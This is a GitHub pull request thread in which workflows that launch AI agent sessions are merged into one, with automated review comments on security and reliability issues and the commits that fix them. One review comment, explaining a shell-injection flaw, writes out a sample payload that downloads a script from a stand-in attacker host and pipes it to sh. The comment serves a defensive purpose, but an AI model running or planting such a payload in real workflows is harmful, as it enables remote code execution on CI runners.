feat: consolidate Amber Handler — single workflow for all AI automation#1180
Merged
Gkrumbach07 merged 8 commits intomainfrom Apr 3, 2026
Merged
feat: consolidate Amber Handler — single workflow for all AI automation#1180Gkrumbach07 merged 8 commits intomainfrom
Gkrumbach07 merged 8 commits intomainfrom
Conversation
Merge triage.yml and pr-fixer.yml into amber-issue-handler.yml as one unified Amber Handler with four jobs: - handle-issue-label: amber:auto-fix label → create session to fix issue - handle-comment: @amber on issue or PR → create session with user's text - batch-pr-fixer: 30 min cron, manage all amber:managed PRs Other changes: - Unified labels: amber:managed, amber:triaged, amber:needs-human - @amber comments pass user text directly, no injected instructions - Removed amber:refactor and amber:test-coverage label triggers - Delete pr-fixer.yml and triage.yml (consolidated) - Per-job concurrency groups to prevent overlap Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Contributor
|
Note Reviews pausedIt looks like this branch is under active development. To avoid overwhelming you with review comments due to an influx of new commits, CodeRabbit has automatically paused this review. You can configure this behavior by changing the Use the following commands to manage reviews:
Use the checkboxes below for quick actions:
📝 WalkthroughWalkthroughReplaces prior single-PR fixer and triage workflows with a single Changes
sequenceDiagram
participant User
participant GitHub
participant AmberWF as "amber-issue-handler\n(workflow)"
participant Ambient as "ambient-code\nambient-action"
participant PR as "Pull Request"
User->>GitHub: add label `amber:auto-fix` / post comment `@amber` / (scheduled)
GitHub->>AmberWF: trigger event (issues/comment/schedule)
AmberWF->>Ambient: create/start session (include PR frontmatter if present)
Ambient-->>AmberWF: session id / phase / output
AmberWF->>GitHub: add labels/comments or update PR frontmatter
alt Batch run for `amber:managed` PRs
AmberWF->>GitHub: read PR frontmatter
AmberWF->>Ambient: start follow-up session if activity since `last_action`
Ambient-->>AmberWF: session result
AmberWF->>GitHub: update PR/frontmatter or add `amber:needs-human` on retry limit
end
Important Pre-merge checks failedPlease resolve all errors before merging. Addressing warnings is optional. ❌ Failed checks (2 errors)
✅ Passed checks (4 passed)
✨ Finishing Touches🧪 Generate unit tests (beta)
✨ Simplify code
Comment |
![coderabbitai[bot]](https://avatars.githubusercontent.com/in/347564?s=60&v=4){kind=small}
Contributor
There was a problem hiding this comment.
Actionable comments posted: 4
🤖 Prompt for all review comments with AI agents
Verify each finding against the current code and only fix it if needed.
Inline comments:
In @.github/workflows/amber-issue-handler.yml:
- Around line 162-179: The workflow is always creating a new Ambient session in
the "Create session" step (id: session) instead of reusing an existing ACP
session recorded in the PR frontmatter (key: acp:session_id) for amber:managed
PRs; update the job so that before calling ambient-code/ambient-action it
resolves the PR frontmatter (using the same logic that reads
steps.context.outputs.type and the PR frontmatter) and, if an acp:session_id
exists, pass that session id to the action (or skip creating a new session and
route the comment to that existing session) so the comment is forwarded to the
already-running agent; apply the same change to the second identical block
mentioned (the block around lines 244-265) so both places reuse acp:session_id
when present.
- Around line 100-109: The current workflow always runs the gh issue edit to add
"amber:triaged" before checking SESSION_NAME, so failed/no-session runs still
get triaged; change the logic so the label is only added when a session was
successfully created by moving the gh issue edit command into the existing
SESSION_NAME conditional (the block that checks if [ -n "$SESSION_NAME" ]) or by
adding an explicit check that SESSION_NAME is non-empty before running gh issue
edit; update references to SESSION_NAME and SESSION_PHASE accordingly so the
label and comment only run together when a session exists.
- Around line 68-71: Replace the mutable tag uses:
ambient-code/ambient-action@v0.0.3 with the action's immutable commit SHA for
each occurrence of the workflow step that references ambient-code/ambient-action
(the "Create session" step id: session and the other two uses entries later in
the file); update all three uses entries to the same full commit SHA string to
ensure reproducible runs and prevent upstream tag retargeting.
- Around line 54-60: The existing PR lookup may miss PRs because gh pr list
defaults to 30 and can return incomplete results, and the jq
test("source=.*#${NUMBER}") produces false positives when issue numbers are
substrings (e.g., `#12` matching `#123`); update the command in the step with id
existing to (1) increase the gh pr list result window (e.g., add --limit 1000)
so it scans all open PRs, and (2) tighten the jq filter used to set EXISTING by
replacing test("source=.*#${NUMBER}") with a regex that enforces a non-digit
boundary after the number such as test("source=.*#${NUMBER}([^0-9]|$)") (ensure
proper quoting/escaping of the shell variable NUMBER in the jq expression) so
only exact issue-number matches are detected.
🪄 Autofix (Beta)
Fix all unresolved CodeRabbit comments on this PR:
- Push a commit to this branch (recommended)
- Create a new PR with the fixes
ℹ️ Review info
⚙️ Run configuration
Configuration used: Path: .coderabbit.yaml
Review profile: CHILL
Plan: Pro
Run ID: 2544cb4d-0420-4614-af03-bf10b8a339ba
📒 Files selected for processing (3)
.github/workflows/amber-issue-handler.yml.github/workflows/pr-fixer.yml.github/workflows/triage.yml
💤 Files with no reviewable changes (2)
- .github/workflows/triage.yml
- .github/workflows/pr-fixer.yml
Comment on lines
+68
to
+71
| - name: Create session | ||
| if: steps.existing.outputs.skip != 'true' | ||
| id: session | ||
| uses: ambient-code/ambient-action@v0.0.3 |
Contributor
There was a problem hiding this comment.
🧩 Analysis chain
🏁 Script executed:
cat -n .github/workflows/amber-issue-handler.yml | sed -n '60,75p'Repository: ambient-code/platform
Length of output: 959
🏁 Script executed:
cat -n .github/workflows/amber-issue-handler.yml | sed -n '160,170p'Repository: ambient-code/platform
Length of output: 493
🏁 Script executed:
cat -n .github/workflows/amber-issue-handler.yml | sed -n '200,215p'Repository: ambient-code/platform
Length of output: 697
🏁 Script executed:
# Search for all uses of ambient-action to ensure we catch all occurrences
rg "ambient-action" .github/workflows/amber-issue-handler.yml -nRepository: ambient-code/platform
Length of output: 222
Pin ambient-action to commit SHA at lines 71, 165, and 207.
Currently using mutable version tag @v0.0.3. Replace with full commit SHA for each uses: ambient-code/ambient-action reference to ensure reproducible runs and prevent upstream tag retargets.
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.
In @.github/workflows/amber-issue-handler.yml around lines 68 - 71, Replace the
mutable tag uses: ambient-code/ambient-action@v0.0.3 with the action's immutable
commit SHA for each occurrence of the workflow step that references
ambient-code/ambient-action (the "Create session" step id: session and the other
two uses entries later in the file); update all three uses entries to the same
full commit SHA string to ensure reproducible runs and prevent upstream tag
retargeting.
- Fix existing-PR regex: use boundary match to prevent #12 matching #123, add --limit 200 to gh pr list - Only add amber:triaged label after session creation succeeds - Add session reuse for @amber on PRs: read frontmatter session_id, pass as session-name to ambient-action (reuse if exists, create if not) - Bump ambient-action to v0.0.4 Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
… fix - @amber alone (no text) → follow-up/fix prompt (assess CI, conflicts, reviews) - @amber <text> → custom prompt (just context + user's words) - amber:auto-fix label → fresh session prompt (investigate and create PR) - Batch job rewritten as shell-driven Python instead of LLM orchestrator: parses frontmatter, checks changes, circuit breaker all in deterministic code, only calls ambient-action for actual fixes - All paths check frontmatter for session reuse Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Contributor
There was a problem hiding this comment.
Actionable comments posted: 4
♻️ Duplicate comments (1)
.github/workflows/amber-issue-handler.yml (1)
71-71:⚠️ Potential issue | 🟠 MajorPin
ambient-code/ambient-actionto immutable SHAs.All three
uses:entries are on mutable tags (@v0.0.4), which weakens reproducibility and supply-chain safety.As per coding guidelines "
.github/workflows/**/*.{yml,yaml}: - Pin action versions to SHA. Verify secrets are not exposed and permissions are scoped."Also applies to: 182-182, 218-218
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed. In @.github/workflows/amber-issue-handler.yml at line 71, Replace the mutable tag references to ambient-code/ambient-action@v0.0.4 with immutable commit SHAs for all occurrences (the uses: lines at the shown locations and the other two occurrences noted); locate the three uses entries that reference ambient-code/ambient-action and change each to use the corresponding full commit SHA (e.g., ambient-code/ambient-action@<full-commit-sha>) so the workflow is pinned to an immutable revision and update the workflow file accordingly.
🤖 Prompt for all review comments with AI agents
Verify each finding against the current code and only fix it if needed.
Inline comments:
In @.github/workflows/amber-issue-handler.yml:
- Around line 330-333: The circuit-breaker never advances because
fm["retry_count"] is never updated; modify the failure-handling path that
currently checks fm["retry_count"] (and calls gh("pr", "edit", ...
"--add-label", "amber:needs-human", "--remove-label", "amber:managed") and
gh("pr", "comment", ...)) to first increment fm["retry_count"] and update
fm["last_action"] in the PR frontmatter via gh("pr", "edit", ...) (or equivalent
frontmatter write) so the next workflow run sees the new retry_count; apply the
same change to the other identical failure blocks (the occurrences surrounding
the other gh("pr","edit") calls) so retries will deterministically trip after
reaching the threshold.
- Around line 150-152: The bash step currently injects github.event.comment.body
inline into COMMENT, which is vulnerable to shell injection; instead set an
environment variable (e.g., COMMENT_BODY) from github.event.comment.body in the
workflow step's env and reference $COMMENT_BODY inside the script; update the
uses of COMMENT and STRIPPED to read from COMMENT_BODY (e.g., assign
COMMENT="$COMMENT_BODY" then use safe expansion like printf '%s' "$COMMENT" |
sed 's/@amber//g' | tr -d '[:space:]') so untrusted text is not interpolated
into the shell command string.
- Around line 369-377: The workflow is invoking create_session.py via
os.path.join(os.environ.get("GITHUB_ACTION_PATH", "."), "create_session.py") but
create_session.py is missing; add the script into the repo (e.g.,
.github/scripts/create_session.py) and update the invocation to point to that
location (replace the fallback join with the explicit script path or build the
path from GITHUB_ACTION_PATH to ".github/scripts/create_session.py"); ensure the
script is executable and accepts the same CLI args (API_URL, API_TOKEN, PROJECT,
prompt_file, session_name, timeout) so the call in the workflow succeeds.
- Line 268: The pip install command `pip install --quiet requests>=2.31.0` is
being mis-parsed by the shell; update the workflow to quote the version
specifier (e.g., change the package arg to "requests>=2.31.0" or
'requests>=2.31.0') so the shell doesn't treat `>` as redirection; locate the
line containing that exact command in the workflow and wrap the package/version
in quotes.
---
Duplicate comments:
In @.github/workflows/amber-issue-handler.yml:
- Line 71: Replace the mutable tag references to
ambient-code/ambient-action@v0.0.4 with immutable commit SHAs for all
occurrences (the uses: lines at the shown locations and the other two
occurrences noted); locate the three uses entries that reference
ambient-code/ambient-action and change each to use the corresponding full commit
SHA (e.g., ambient-code/ambient-action@<full-commit-sha>) so the workflow is
pinned to an immutable revision and update the workflow file accordingly.
🪄 Autofix (Beta)
Fix all unresolved CodeRabbit comments on this PR:
- Push a commit to this branch (recommended)
- Create a new PR with the fixes
ℹ️ Review info
⚙️ Run configuration
Configuration used: Path: .coderabbit.yaml
Review profile: CHILL
Plan: Pro
Run ID: 618c0264-7021-41e4-b809-5b22f0fef33c
📒 Files selected for processing (1)
.github/workflows/amber-issue-handler.yml
Previously skipped amber:managed PRs with no frontmatter. Now creates a new session for them. Circuit breaker and change detection only apply when frontmatter exists. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Contributor
There was a problem hiding this comment.
♻️ Duplicate comments (4)
.github/workflows/amber-issue-handler.yml (4)
268-268:⚠️ Potential issue | 🟠 MajorQuote pip specifier —
>is shell redirection.
requests>=2.31.0unquoted causes shell to interpret>as redirect.- pip install --quiet requests>=2.31.0 + python3 -m pip install --quiet 'requests>=2.31.0'🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed. In @.github/workflows/amber-issue-handler.yml at line 268, The pip install line uses an unquoted version specifier so the shell may treat the `>` as redirection; update the pip install invocation (the line containing `pip install --quiet requests>=2.31.0`) to quote or escape the package specifier (e.g., wrap requests>=2.31.0 in single or double quotes) so the `>` is passed to pip rather than the shell.
373-386:⚠️ Potential issue | 🔴 Critical
create_session.pymissing;GITHUB_ACTION_PATHunset in workflow runs.
GITHUB_ACTION_PATHis only populated inside composite actions. Here it falls back to., butcreate_session.pydoesn't exist anywhere in the repo. This batch job will fail.Options:
- Inline the session-creation logic using
requestsdirectly in the heredoc- Add the script to
.github/scripts/and reference explicitly- Use
ambient-actionvia a sub-workflow or direct API call🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed. In @.github/workflows/amber-issue-handler.yml around lines 373 - 386, The workflow invokes create_session.py via sys.executable and GITHUB_ACTION_PATH but that script isn't in the repo and GITHUB_ACTION_PATH is unset, causing failures; fix by either (A) inlining the HTTP session-creation logic directly into the heredoc using requests (replace the subprocess.run(cmd, ...) call and build the API POST with API_URL, API_TOKEN, PROJECT, prompt_file, model, repos payload, handling timeout and session_id), or (B) add create_session.py under .github/scripts/ and update the command to call the explicit path (os.path.join('.', '.github', 'scripts', 'create_session.py')) so GITHUB_ACTION_PATH fallback is not relied upon; update any references to cmd, subprocess.run, prompt_file and session_id accordingly and ensure the action has network permission to call the API.
333-338:⚠️ Potential issue | 🟠 MajorCircuit breaker inert —
retry_countnever incremented.Line 334 checks
retry_count >= 3, but line 363 always writesretry_count=0in the prompt. No code path increments this value on failure, so the breaker never trips.Need to either:
- Increment
retry_countin frontmatter when the session fails/errors- Or track state externally (labels, issue comments, etc.)
Also applies to: 363-363
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed. In @.github/workflows/amber-issue-handler.yml around lines 333 - 338, The circuit breaker never trips because fm["retry_count"] is always reset to 0 in the generated prompt and never incremented on failures; update the PR-processing failure paths to increment fm["retry_count"] (the frontmatter map `fm`) whenever a session fails/error occurs and persist that back to the PR (e.g., reuse the gh("pr","edit", ..., "--add-label"/"--remove-label" call pattern or update the PR body) so the existing check if fm["retry_count"] >= 3 will work, or alternatively implement an external state change (e.g., add/update a label or comment) in the same failure branch instead of resetting retry_count in the prompt generation.
150-151:⚠️ Potential issue | 🔴 CriticalShell injection via untrusted
comment.body.
github.event.comment.bodyinterpolated directly into shell. Malicious comment like'; curl attacker.com/pwn.sh | sh; echo 'breaks out.Pass via env:
- name: Resolve context id: context env: GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + COMMENT_BODY: ${{ github.event.comment.body }} run: | NUMBER="${{ github.event.issue.number }}" echo "number=$NUMBER" >> $GITHUB_OUTPUT # Determine if `@amber` is alone (fix prompt) or has instruction text (custom prompt) - COMMENT='${{ github.event.comment.body }}' + COMMENT="$COMMENT_BODY" STRIPPED=$(echo "$COMMENT" | sed 's/@amber//g' | tr -d '[:space:]')🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed. In @.github/workflows/amber-issue-handler.yml around lines 150 - 151, The current workflow injects github.event.comment.body directly into a single-quoted shell assignment (COMMENT='${{ github.event.comment.body }}') which allows a malicious comment to break out and execute commands; move the value into the GitHub Actions env context (set COMMENT: ${{ github.event.comment.body }} under env) and then operate on it safely in the shell using bash parameter expansion rather than command substitution or unquoted interpolation: reference COMMENT and compute STRIPPED using safe expansions (e.g., remove the literal "@amber" and all whitespace via bash parameter substitution like replacing patterns) so no shell-evaluated input can escape into commands.
🤖 Prompt for all review comments with AI agents
Verify each finding against the current code and only fix it if needed.
Duplicate comments:
In @.github/workflows/amber-issue-handler.yml:
- Line 268: The pip install line uses an unquoted version specifier so the shell
may treat the `>` as redirection; update the pip install invocation (the line
containing `pip install --quiet requests>=2.31.0`) to quote or escape the
package specifier (e.g., wrap requests>=2.31.0 in single or double quotes) so
the `>` is passed to pip rather than the shell.
- Around line 373-386: The workflow invokes create_session.py via sys.executable
and GITHUB_ACTION_PATH but that script isn't in the repo and GITHUB_ACTION_PATH
is unset, causing failures; fix by either (A) inlining the HTTP session-creation
logic directly into the heredoc using requests (replace the subprocess.run(cmd,
...) call and build the API POST with API_URL, API_TOKEN, PROJECT, prompt_file,
model, repos payload, handling timeout and session_id), or (B) add
create_session.py under .github/scripts/ and update the command to call the
explicit path (os.path.join('.', '.github', 'scripts', 'create_session.py')) so
GITHUB_ACTION_PATH fallback is not relied upon; update any references to cmd,
subprocess.run, prompt_file and session_id accordingly and ensure the action has
network permission to call the API.
- Around line 333-338: The circuit breaker never trips because fm["retry_count"]
is always reset to 0 in the generated prompt and never incremented on failures;
update the PR-processing failure paths to increment fm["retry_count"] (the
frontmatter map `fm`) whenever a session fails/error occurs and persist that
back to the PR (e.g., reuse the gh("pr","edit", ...,
"--add-label"/"--remove-label" call pattern or update the PR body) so the
existing check if fm["retry_count"] >= 3 will work, or alternatively implement
an external state change (e.g., add/update a label or comment) in the same
failure branch instead of resetting retry_count in the prompt generation.
- Around line 150-151: The current workflow injects github.event.comment.body
directly into a single-quoted shell assignment (COMMENT='${{
github.event.comment.body }}') which allows a malicious comment to break out and
execute commands; move the value into the GitHub Actions env context (set
COMMENT: ${{ github.event.comment.body }} under env) and then operate on it
safely in the shell using bash parameter expansion rather than command
substitution or unquoted interpolation: reference COMMENT and compute STRIPPED
using safe expansions (e.g., remove the literal "@amber" and all whitespace via
bash parameter substitution like replacing patterns) so no shell-evaluated input
can escape into commands.
ℹ️ Review info
⚙️ Run configuration
Configuration used: Path: .coderabbit.yaml
Review profile: CHILL
Plan: Pro
Run ID: ec009339-0a0d-4b27-a447-a1882efbbf0c
📒 Files selected for processing (1)
.github/workflows/amber-issue-handler.yml
- Batch job now uses requests library directly instead of shelling out to create_session.py (which isn't available in the GHA runner) - handle-comment on issues now checks for existing amber:managed PR and reuses its session ID if found - Added helper functions: get_session_phase, start_session_api, create_session_api for the batch Python script Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Contributor
There was a problem hiding this comment.
Actionable comments posted: 1
♻️ Duplicate comments (4)
.github/workflows/amber-issue-handler.yml (4)
71-71:⚠️ Potential issue | 🟠 MajorPin
ambient-actionto immutable commit SHAs.Using
@v0.0.4is mutable and weakens workflow supply-chain guarantees. Replace all three with the same full commit SHA.#!/bin/bash set -euo pipefail # Expectation: this should return no matches after fix. rg -n 'uses:\s*ambient-code/ambient-action@v0\.0\.4' .github/workflows/amber-issue-handler.ymlAs per coding guidelines, ".github/workflows/**/*.{yml,yaml}: - Pin action versions to SHA. Verify secrets are not exposed and permissions are scoped."
Also applies to: 190-190, 226-226
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed. In @.github/workflows/amber-issue-handler.yml at line 71, The workflow currently pins ambient-code/ambient-action using the mutable tag "ambient-action@v0.0.4" in three places; replace each occurrence with the same immutable full commit SHA (the full 40-char commit hash) so all three uses point to that SHA, not the tag, and ensure you do not change other actions or expose secrets; after replacing verify no remaining matches with the provided rg command and confirm all three instances (the ones flagged in the comment) were updated to the identical commit SHA.
276-276:⚠️ Potential issue | 🟠 MajorQuote the
pipversion specifier (currently shell-parsed).Line 276 uses
requests>=2.31.0unquoted;>is handled by the shell, not as part of the package constraint.Suggested fix
- pip install --quiet requests>=2.31.0 + python3 -m pip install --quiet 'requests>=2.31.0'#!/bin/bash set -euo pipefail # Expectation: no matches after fix. rg -n 'pip install --quiet requests>=2\.31\.0|python3 -m pip install --quiet requests>=2\.31\.0' .github/workflows/amber-issue-handler.yml🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed. In @.github/workflows/amber-issue-handler.yml at line 276, The pip install command currently uses an unquoted version specifier ("pip install --quiet requests>=2.31.0") so the shell can interpret the ">"; fix it by quoting or escaping the package specifier (e.g., use "pip install --quiet 'requests>=2.31.0'" or equivalent) where the line contains pip install --quiet requests>=2.31.0 so the constraint is passed to pip rather than the shell.
143-143:⚠️ Potential issue | 🔴 CriticalAvoid inline interpolation of untrusted comment text in shell.
Line 150 injects
github.event.comment.bodydirectly into the script body; this is shell-injection prone.Suggested fix
- name: Resolve context id: context env: GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + COMMENT_BODY: ${{ github.event.comment.body }} run: | NUMBER="${{ github.event.issue.number }}" echo "number=$NUMBER" >> $GITHUB_OUTPUT # Determine if `@amber` is alone (fix prompt) or has instruction text (custom prompt) - COMMENT='${{ github.event.comment.body }}' - STRIPPED=$(echo "$COMMENT" | sed 's/@amber//g' | tr -d '[:space:]') + COMMENT="$COMMENT_BODY" + STRIPPED=$(printf '%s' "$COMMENT" | sed 's/@amber//g' | tr -d '[:space:]')Also applies to: 150-151
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed. In @.github/workflows/amber-issue-handler.yml at line 143, The workflow currently inlines github.event.comment.body directly into the run script (env:) which is shell-injection prone; instead set an environment variable (e.g., COMMENT_BODY) using the expression github.event.comment.body in the job/step env and then consume it safely in the run step (for example: printf '%s' "$COMMENT_BODY" or write it to a temp file with printf) so the shell never interprets untrusted content; update references to use COMMENT_BODY (or a temp file) rather than embedding github.event.comment.body directly in the script.
413-418:⚠️ Potential issue | 🟠 MajorCircuit breaker reads
retry_countbut never advances it.Line 414 checks threshold, but there is no frontmatter update path that increments
retry_count; this makes tripping toamber:needs-humannon-deterministic.Also applies to: 447-447
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed. In @.github/workflows/amber-issue-handler.yml around lines 413 - 418, The circuit-breaker check reads fm["retry_count"] but never increments or persists it, so the retry threshold never advances; update the failure/attempt paths that handle an unresolved attempt to increment fm["retry_count"] (e.g., fm["retry_count"] += 1) and then persist that change back to the PR frontmatter using the existing frontmatter update routine (the same helper you use elsewhere to write fm back to the PR or call gh to edit the PR body), ensuring the increment happens before continuing; apply the same fix to the duplicate check location that also reads retry_count.
🤖 Prompt for all review comments with AI agents
Verify each finding against the current code and only fix it if needed.
Inline comments:
In @.github/workflows/amber-issue-handler.yml:
- Around line 39-40: The workflow uses two different concurrency group names for
the same issue which allows parallel runs to race; change both concurrency group
definitions to use the exact same shared key (for example replace both
occurrences with group: amber-issue-${{ github.event.issue.number }} or another
single consistent string like amber-issue-${{ github.event.issue.number
}}-shared) so label and comment paths share one concurrency lock and prevent
duplicate session creation.
---
Duplicate comments:
In @.github/workflows/amber-issue-handler.yml:
- Line 71: The workflow currently pins ambient-code/ambient-action using the
mutable tag "ambient-action@v0.0.4" in three places; replace each occurrence
with the same immutable full commit SHA (the full 40-char commit hash) so all
three uses point to that SHA, not the tag, and ensure you do not change other
actions or expose secrets; after replacing verify no remaining matches with the
provided rg command and confirm all three instances (the ones flagged in the
comment) were updated to the identical commit SHA.
- Line 276: The pip install command currently uses an unquoted version specifier
("pip install --quiet requests>=2.31.0") so the shell can interpret the ">"; fix
it by quoting or escaping the package specifier (e.g., use "pip install --quiet
'requests>=2.31.0'" or equivalent) where the line contains pip install --quiet
requests>=2.31.0 so the constraint is passed to pip rather than the shell.
- Line 143: The workflow currently inlines github.event.comment.body directly
into the run script (env:) which is shell-injection prone; instead set an
environment variable (e.g., COMMENT_BODY) using the expression
github.event.comment.body in the job/step env and then consume it safely in the
run step (for example: printf '%s' "$COMMENT_BODY" or write it to a temp file
with printf) so the shell never interprets untrusted content; update references
to use COMMENT_BODY (or a temp file) rather than embedding
github.event.comment.body directly in the script.
- Around line 413-418: The circuit-breaker check reads fm["retry_count"] but
never increments or persists it, so the retry threshold never advances; update
the failure/attempt paths that handle an unresolved attempt to increment
fm["retry_count"] (e.g., fm["retry_count"] += 1) and then persist that change
back to the PR frontmatter using the existing frontmatter update routine (the
same helper you use elsewhere to write fm back to the PR or call gh to edit the
PR body), ensuring the increment happens before continuing; apply the same fix
to the duplicate check location that also reads retry_count.
🪄 Autofix (Beta)
Fix all unresolved CodeRabbit comments on this PR:
- Push a commit to this branch (recommended)
- Create a new PR with the fixes
ℹ️ Review info
⚙️ Run configuration
Configuration used: Path: .coderabbit.yaml
Review profile: CHILL
Plan: Pro
Run ID: ad1f1798-f2ae-45da-8316-64f58429245b
📒 Files selected for processing (1)
.github/workflows/amber-issue-handler.yml
@amber alone on a PR → fix prompt (resolve CI, conflicts, reviews) @amber alone on an issue → fresh prompt (investigate, implement, create PR) Previously the fix prompt was used for both, which told the session to "assess merge conflicts" on issues that have no PR yet. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
- Fix shell injection: pass comment body via env var, not inline interpolation - Unify concurrency groups: all jobs use amber-$N to prevent races - Quote pip specifier to prevent shell glob expansion - Fix circuit breaker: batch script now increments retry_count in frontmatter after each fix attempt (was always reset to 0) Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
- Replace per-PR timeline API calls with updatedAt from gh pr list (1 API call instead of N+1) - Validate last_action format (ISO8601) to prevent jq/shell injection from untrusted frontmatter - Move re import to top level Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Contributor
There was a problem hiding this comment.
Actionable comments posted: 1
🧹 Nitpick comments (1)
.github/workflows/amber-issue-handler.yml (1)
479-488: Frontmatter update relies on exact string match.If frontmatter has been modified (extra whitespace, reordering),
body.replace(old_fm, new_fm)will silently fail and skip the update. This is acceptable — the next cycle will retry. Consider logging whennew_body == bodyfor observability.Optional: Log when frontmatter update is skipped
new_body = body.replace(old_fm, new_fm) if new_body != body: gh("pr", "edit", str(number), "--repo", REPO, "--body", new_body) print(f" Updated frontmatter: retry_count={new_count}, last_action={now}") + else: + print(f" Warning: frontmatter replacement failed (string mismatch)")🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed. In @.github/workflows/amber-issue-handler.yml around lines 479 - 488, The frontmatter replacement uses an exact string match (old_fm) against body and silently skips when body.replace(old_fm, new_fm) yields no change; update the block around fm/old_fm/new_fm/body so that when new_body == body you emit a clear log (e.g., via print or the existing logger) indicating the frontmatter update was skipped and include context such as session_id and retry_count; keep the existing gh("pr","edit",...) path unchanged and only add the logging branch to improve observability.
🤖 Prompt for all review comments with AI agents
Verify each finding against the current code and only fix it if needed.
Inline comments:
In @.github/workflows/amber-issue-handler.yml:
- Line 71: The workflow currently references the mutable tag
"ambient-code/ambient-action@v0.0.4"; replace that tag with the specific commit
SHA "ambient-code/ambient-action@1204c23cd7f193bd056c11d13634b3c5a08d142a" so
the action is pinned to an immutable revision and the workflow becomes
reproducible.
---
Nitpick comments:
In @.github/workflows/amber-issue-handler.yml:
- Around line 479-488: The frontmatter replacement uses an exact string match
(old_fm) against body and silently skips when body.replace(old_fm, new_fm)
yields no change; update the block around fm/old_fm/new_fm/body so that when
new_body == body you emit a clear log (e.g., via print or the existing logger)
indicating the frontmatter update was skipped and include context such as
session_id and retry_count; keep the existing gh("pr","edit",...) path unchanged
and only add the logging branch to improve observability.
🪄 Autofix (Beta)
Fix all unresolved CodeRabbit comments on this PR:
- Push a commit to this branch (recommended)
- Create a new PR with the fixes
ℹ️ Review info
⚙️ Run configuration
Configuration used: Path: .coderabbit.yaml
Review profile: CHILL
Plan: Pro
Run ID: 5c623744-4ec3-4641-8271-6b3a4572fa9a
📒 Files selected for processing (1)
.github/workflows/amber-issue-handler.yml
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
1 participant
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
Summary
Consolidate
amber-issue-handler.yml,pr-fixer.yml, andtriage.ymlinto a singleamber-issue-handler.yml(Amber Handler).Jobs
handle-issue-labelamber:auto-fixlabelhandle-comment@amberon issue or PRbatch-pr-fixeramber:managedPRsChanges
@amberis now universal — works on both issues and PRs, passes the user's comment text directly with no injected instructionsamber:namespace:amber:managed,amber:triaged,amber:needs-humanamber:refactorandamber:test-coveragelabel triggerspr-fixer.ymlandtriage.yml(consolidated)ambient-action@v0.0.3with inactivity timeoutTest plan
amber:auto-fixlabel to an issue — verify session created@amber fix the typo in READMEon an issue — verify session created with that text@amberon a PR — verify session created with PR contextamber:managedPRs are picked up by batch cron🤖 Generated with Claude Code
Summary by CodeRabbit
New Features
Chores